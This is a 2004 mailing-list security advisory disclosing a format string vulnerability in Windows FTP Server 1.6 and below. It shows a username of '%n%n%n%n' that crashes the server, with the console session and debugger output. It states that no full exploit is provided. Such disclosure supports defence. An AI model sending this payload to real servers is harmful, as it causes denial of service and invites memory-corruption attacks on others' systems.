Date: Thu, 08 Jan 2004 22:01:56 +0000
From: "Peter Winter-Smith" <peter4020@...mail.com>
To: vulnwatch@...nwatch.org
Subject: Windows FTP Server Format String Vulnerability

Windows FTP Server Format String Vulnerability

Credit:
Author     : Peter Winter-Smith

Software:
Packages   : Windows FTP Server
Version    : 1.6 and below
Vendor     : HD Soft/Windows Ftp Server SOFTWARE
Vendor Url : http://srv.nease.net/

Vulnerability:
Bug Type   : 'wscanf' Format String Vulnerability
Severity   : Moderately/Highly Critical
              + Denial of Service
              + Arbitrary Memory Can Be Read/Written

1. Description of Software

   "Are you wondering how to setup a FTP server ?
Companies small to large have their own web sites to distribute info,
products, contact, description of their services, files...
    When it comes to files such as software downloads, music, movies,
documents the easiest and quickest way to distribute them to the people
who need them is to use an FTP Server!
    Maybe Windows FTP Server is the one for you ... why not try Windows
Ftp Server Software for free and make your opinion ?"
- Vendor's Description

2. Bug Information

(a). 'wscanf' Format String Vulnerability

It seems that Windows FTP Server does not directly specify an input
formatting type when receiving data from a remote client, this may
potentially allow certain arbitrary positions in memory to be read from
and written to if an attacker is able to send a specially crafted request
to the server.

A demonstration is as follows:

First I connect to the FTP server using the Windows built in FTP client. I
specify my 'username' to be '%n%n%n%n', and the server immediately
crashes.

---------------

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ftp 127.0.0.1
Connected to 127.0.0.1.
220 Welcome to Windows FTP Server
User (127.0.0.1:(none)): %n%n%n%n
Connection closed by remote host.

C:\WINDOWS\system32>

---------------

Upon attaching a debugger to the application, you can immediately see
where the problem lies:

---------------

0:004> g
(a98.9b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000004 ebx=0000006e ecx=0000000c edx=009843bb esi=0140e864 edi=
0098436e
eip=77c3f665 esp=0140e61c ebp=0140e878 iopl=0         nv up ei pl zr na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=
00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols
for C:\WINDOWS\system32\MSVCRT.dll -
MSVCRT!wscanf+654:
77c3f665 8908            mov    [eax],ecx        ds:0023:00000004=????????

---------------

We managed to cause the application to write to an address which it did
not have access to. By varying the content of the command string supplied
to the server it seems very possible to overwrite different arbitrary
areas of memory with an arbitrary value. This may include saved return
addresses and information detailing user privileges, and so forth, making
this flaw potentially very dangerous.

3. Proof of Concept Code

I did not dedicate much time to the construction of an exploit for this
issue since the exploitation did not appear to be quite as straight
forward as other format string bugs which I have worked with in the past,
therefore no very exciting code is available at this point. To merely
examine the flaw I recommend that you attempt the steps show in the
previous section for yourself.

4. Patches - Workarounds

Currently no patches exist. The vendor has been notified.

5. Credits

    The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
    David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.

o This document should be mirrored at:
    - http://www.elitehaven.net/winftpserver.txt